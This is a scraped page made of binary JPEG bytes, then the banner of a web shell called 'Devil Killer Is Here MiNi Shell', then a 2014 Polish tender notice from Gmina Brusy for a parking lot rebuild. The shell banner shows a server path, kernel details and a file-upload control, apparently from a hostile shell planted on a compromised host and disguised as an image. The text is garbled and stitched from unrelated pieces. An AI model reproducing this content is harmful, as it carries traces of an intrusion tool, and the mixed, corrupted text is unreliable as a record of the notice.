JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140418/86429-N-2014.html

<p class="kh_header"><b>Brusy: Realizacja zadania pn.: Przebudowa parkingu i urządzenie zieleni w obrębie ulic Młyńskiej i Na Zaborach w Brusach, współfinansowanego w ramach Środka 4.1 Rozwój obszarów zależnych od rybactwa, objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa, zawartą w Programie Operacyjnym Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013 Europejskiego Funduszu Rybackiego</b><br>
<b>Numer ogłoszenia: 86429 - 2014; data zamieszczenia: 18.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brusy , ul. Na Zaborach 1, 89-632 Brusy, woj. pomorskie, tel. 52 3969302, faks 52 3969303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brusy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zadania pn.: Przebudowa parkingu i urządzenie zieleni w obrębie ulic Młyńskiej i Na Zaborach w Brusach, współfinansowanego w ramach Środka 4.1 Rozwój obszarów zależnych od rybactwa, objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa, zawartą w Programie Operacyjnym Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013 Europejskiego Funduszu Rybackiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia swoim zakresem obejmuje: 
a)rozbiórkę istniejącej nawierzchni
b)demontaż istniejących urządzeń i elementów małej architekturo wraz z przewiezieniem zdemontowanych elementów w miejsce wskazane przez Zamawiającego
c)przebudowę istniejącego parkingu wraz z drogami dojazdowymi oraz placami manewrowymi:
-budowę dróg dojazdowych i placów manewrowych o nawierzchni z kostki betonowej i kostki granitowej. Nawierzchnię należy zamknąć krawężnikiem bet. gr. 15 cm x 30 cm na ławie betonowej,
- budowę 77 miejsc postojowych, w tym 7 dla niepełnosprawnych, o nawierzchni 
z kostki betonowej. Nawierzchnię należy zamknąć krawężnikiem betonowym typu opornik 12cmx15cm na ławie betonowej,
- budowę chodnika o nawierzchni z kostki klinkierowej drogowej w ciemnym kolorze. Nawierzchnię należy zamknąć obrzeżem betonowym gr. 8 cm na podsypce cementowo - piaskowej
-wymianę nawierzchni podjazdu dla osób niepełnosprawnych na nawierzchnię z kostki klinkierowej drogowej w kolorze jak na chodniku
d)roboty branży sanitarnej, w tym:
-częściowy demontaż wraz z przebudową istniejącego przyłącza wodociągowego PCV 110,
-wykonanie przyłącza wodociągowego do projektowanej  fontanny i zdroju ulicznego, w tym: demontaż istniejącego hydrantu oraz montaż nowego hydrantu p.poż podziemnego D=80 mm, wykonanie studni wodomierzowej o średnicy d=1200 mm,
-wykonanie przyłącza kanalizacji sanitarnej z rur 160 PCV, odprowadzającego ścieki bytowo - gospodarcze z projektowanych dwóch WC,
-wykonanie systemu kanalizacji deszczowej, odprowadzającej wody opadowe 
z dachu budynku Urzędu Miejskiego oraz parkingu do istniejącej sieci deszczowej w ulicy Młyńskiej,
-wykonanie przyłącza wodociągowego wody zimnej z istniejącej kotłowni zlokalizowanej w budynku Urzędu Miejskiego do projektowanych WC
e)roboty branży elektrycznej, w tym:
-budowa przy budynku Urzędu Miejskiego złącza kablowo - rozdzielczego ZKS, zasilanego wewnętrzną linią kablową zalicznikową o dł 75 m z rozdzielni głównej RG w ramach istniejącej mocy przyłączeniowej. Ze złącza ZKS należy wyprowadzić 4 linie kablowe, stanowiące zasilanie fontanny, szlabanu, rozdzielni dla potrzeb sceny oraz słupka energetycznego,
-wybudowanie wewnętrznej linii kablowej oświetleniowej wyprowadzonej 
od złącza ZKS do poszczególnych latarni, montaż słupów oświetleniowych posadowionych na fundamentach betonowych, wraz z oprawami oświetleniowymi LED (oprawy wg Załącznika nr 13 do SIWZ Oprawy oświetleniowe LED)
-wykonanie systemu monitoringu,
-wykonanie zasilania elektrycznego do projektowanej tablicy ogłoszeniowej;
f)wykonanie nasadzeń i siewu oraz wycinki drzew i krzewów zgodnie z projektem zieleni;
g)zakup i montaż elementów małej architektury zgodnie z projektem zagospodarowania terenu branży budowlanej oraz Załącznikiem nr 14 do SIWZ Mała architektura.
UWAGA:
1)	W projekcie branży elektrycznej instalacji monitoringu przewidziano zastosowanie kamer analogowych oraz z rejestratora cyfrowego z dyskiem o pojemności 1TB. Należy przyjąć do wyceny kamery cyfrowe o równoważnych parametrach oraz rejestrator cyfrowy 
z dyskiem o pojemności min. 4 TB. Pozostałe parametry ww. urządzeń należy zachować bez zmian.
2)	Zamiast nawierzchni określonych w projekcie należy wykonać:
- nawierzchnię chodników i podjazdu dla niepełnosprawnych z kostki klinkierowej drogowej w kolorze ciemnym
- nawierzchnię dróg dojazdowych i placów manewrowych z kostki betonowej hydrofobizowanej, śrutowanej, polerowanej, lakierowanej dwoma warstwami lakieru utwardzanym podczerwienią, o nasiąkliwości 4% i wymiarach 20x20x8 (kolor szary), ok. 10% nawierzchni należy wykonać z kostki granitowej gr. 8 cm w kolorze szarym,
- nawierzchnię miejsc postojowych z kostki betonowej hydrofobizowanej, śrutowanej, polerowanej, lakierowanej dwoma warstwami lakieru utwardzanym podczerwienią, o nasiąkliwości 4% i  wymiarach 20x20x8 (kolor szary). Linie oddzielające miejsca postojowe z kostki betonowej hydrofobizowanej, śrutowanej, polerowanej, lakierowanej dwoma warstwami lakieru utwardzanym podczerwienią, o nasiąkliwości 4% i  wymiarach 10x20x8 (kolor grafitowy).
Podbudowy pod ww. nawierzchnie należy wykonać tak jak w projekcie budowlanym branży drogowej.
3)Kolor cegły klinkierowej ogrodzenia należy uzgodnić z Inwestorem na etapie wykonywania robót.
4)W trakcie realizacji inwestycji oraz po jej zakończeniu należy zapewnić ciągły dostęp do sąsiednich nieruchomości. Inwestycja nie może pogorszyć warunków użytkowania sąsiednich nieruchomości. Wykonawca zobowiązany jest do zapewnienia bezpiecznego dojścia do budynku Urzędu Miejskiego dla pracowników oraz interesantów.
5)Kostkę betonową z rozbiórki istniejącej nawierzchni należy ułożyć na paletach 
i przewieźć na teren ZGK Brusy
6)Gruz betonowy z rozbiórki istniejącej nawierzchni Należy przewieźć w miejsce wskazane przez zamawiającego.
7)W wycenie należy ująć wykonanie tablicy promocyjnej o wym. 70 x 90 cm, zamontowanej na stelażu wykonanym z materiałów i w stylu jak gablota pokazana w Załączniku nr 14 do SIWZ Mała architektura. Na tablicy należy umieścić informację o nazwie inwestycji, źródle finansowania oraz znak graficzny Programu operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013 zgodnie z Załącznikiem Nr 15 do SIWZ Księga wizualizacji znaku 2011.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Specyfikacji technicznej wykonania 
i odbioru robót budowlanych - Załącznik Nr 11 do SIWZ, w Projektach budowlanych 
i wykonawczych - Załącznik Nr 10 do SIWZ oraz w Przedmiarach robót (stanowiących materiał pomocniczy przy przygotowywaniu oferty) - załącznik Nr 12 do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.23.30.00-9, 45.23.21.30-2, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od wykonawców wniesienia wadium w wysokości 25.000,00 zł. (Słownie: dwadzieścia pięć tysięcy  złotych 00/100).
2.	W zależności od woli wykonawcy wadium może być wnoszone w jednej lub kilku formach, 
o których mowa w art. 45 ust. 6 ustawy Pzp.
3.	Wadium należy wnieść przed upływem terminu składania ofert.
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miejskiego w Brusach: Bank Spółdzielczy w Koronowie Oddz. w Brusach 59 8144 0005 2005 0500 1267 0002 z adnotacją: Wadium nr sprawy ZP.271.7.2014 (decyduje data uznania wpłaty na koncie zamawiającego). Kserokopię dowodu wpłaty należy dołączyć do oferty.
5.	W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach oryginał wadium należy złożyć w oddzielnej kopercie razem z ofertą a kopię dokumentu wadium należy wpiąć 
w ofertę.
6.	Wadium w przypadku wykonawców działających wspólnie może być wniesione przez  jednego z wykonawców - pełnomocnika, z zaznaczeniem że jest przez niego wnoszone w imieniu wykonawcy.
7.	Wadium wnoszone w formie gwarancji winno zawierać:
a)	nieodwołalne i bezwarunkowe zobowiązanie się do zapłaty kwoty wadium na wypadek gdyby:	
- Wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
- Wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ww. ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
b)	dokładne określenie przedmiotu postępowania,
c)	kwotę zobowiązania,
d)	termin ważności,
e)	klauzule dodatkowe np. nakazujące zwrot dokumentu po jego wygaśnięciu.
8.	Pozostałe formy wniesienia wadium winny zawierać wszystkie elementy wynikające 
z odnośnych i obowiązujących przepisów.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda aby Wykonawcy wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zamówienia polegającego na budowie lub przebudowie drogi lub parkingu 
o nawierzchni z kostki betonowej  brukowej o wartości min. 1.000.000,00 zł.brutto. Ocena spełniania tego warunku zostanie dokonana na podstawie Wykazu robót budowlanych oraz dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone złożonych przez Wykonawców na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda aby Wykonawcy dysponowali osobami zdolnymi do wykonywania zamówienia tj. a)1 osobą na stanowisko kierownika budowy posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej lub drogowej lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów, lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane; b)1 osobą na stanowisko kierownika robót sanitarnych posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów, lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane, c)1 osobą na stanowisko kierownika robót elektrycznych posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów, lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane. Ocena spełniania tego warunku zostanie dokonana na podstawie Wykazu osób oraz oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia złożonych przez Wykonawców na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda aby Wykonawcy wykazali się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zamówienia polegającego na budowie lub przebudowie drogi lub parkingu 
o nawierzchni z kostki betonowej  brukowej o wartości min. 1.000.000,00 zł.brutto;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony formularz oferty - zgodny z wzorem stanowiącym Załącznik Nr 1 do SIWZ; 2)Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu Wykonawcy, w przypadku, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych (wzór - Załącznik Nr 9 do SIWZ); 3)Kserokopia dowodu wniesienia wadium; 4) W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
1)	w zakresie zmiany parametrów przedmiotu umowy, w przypadku:
- aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby
zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym
wykonaniem projektu,
- wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków
geotechnicznych,
- wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków
terenowych, w szczególności istnienia niezinwentaryzowanych podziemnych sieci,
instalacji, urządzeń, obiektów budowlanych, pozostałości, itp.,
- wystąpienia siły wyższej,
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia,
- konieczności wykonania robót zamiennych,
2)	w zakresie zmiany terminu realizacji przedmiotu umowy, w przypadku:
- wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienia niezinwentaryzowanych podziemnych sieci, instalacji, urządzeń, obiektów budowlanych, pozostałości itp.,
- wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków geotechnicznych,
- konieczności udzielenia zamówienia dodatkowego, 
- wprowadzenia zmian w dokumentacji techniczno - projektowej, co może
powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,
- przerw w realizacji robót budowlanych powstałych z przyczyn nieleżących 
po stronie Wykonawcy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy
- braku możliwości niezwłocznego zawarcia umowy z Wykonawcą po dokonaniu wyboru najkorzystniejszej oferty,
- konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów,
- konieczności wykonania prac archeologicznych na terenie budowy,
- zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia,
- wystąpienia siły wyższej,
3)	w zakresie zmiany terminów płatności, w przypadku:
- nieprzewidzianego braku płynności finansowej u Zamawiającego,
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia,
- wystąpienia siły wyższej,
- zmiany terminu wykonania zamówienia,
4)	w zakresie zmiany harmonogramu rzeczowo-finansowego i płatności, w przypadku:
- zmiany parametrów przedmiotu umowy,
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie
dostosowanie treści umowy do aktualnego stanu prawnego,
- zmiany terminu wykonania zamówienia,
- wystąpienia siły wyższej,
- zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia,
5)	w zakresie zmiany zabezpieczenia należytego wykonania umowy, w przypadku:
- zmiany terminu wykonania zamówienia,
- zmiany wynagrodzenia.
6)	w zakresie zmiany wynagrodzenia, w przypadku:
- wyłączenia lub rezygnacji z wykonania części zamówienia (zmniejszenie wynagrodzenia),
- zmiany urzędowej stawki podatku VAT przy zachowaniu ceny netto bez zmian (dotyczy to części wynagrodzenia za prace, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano),
- wystąpienia przyczyny o obiektywnym charakterze, istotna zmiana okoliczności powodująca, że wykonanie części zakresu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia (zmniejszenie wynagrodzenia).
7)	w zakresie podwykonawstwa, w przypadku:
- zmiany zakresu robót powierzonych podwykonawcom,
- zmiany podwykonawcy (pod warunkiem odpowiedniego zgłoszenia i po akceptacji 
przez Zamawiającego)
- zlecenie części robót podwykonawcy (pod warunkiem odpowiedniego zgłoszenia 
i po akceptacji przez Zamawiającego)
- rezygnacji z podwykonawcy.
3.	Siła wyższa oznacza wyjątkowe wydarzenie lub okoliczność:
a)	na którą Strony nie miały wpływu,
b)	przeciw której Strony nie mogły się zabezpieczyć przed zawarciem umowy,
c)	której nie można było w racjonalny sposób uniknąć lub przezwyciężyć,
d)	której nie można uznać za wywołaną w znaczącym stopniu przez żadną ze Stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.brusy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy, pok. 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2014 godzina 11:00, miejsce: Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy, Biuro interesanta, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




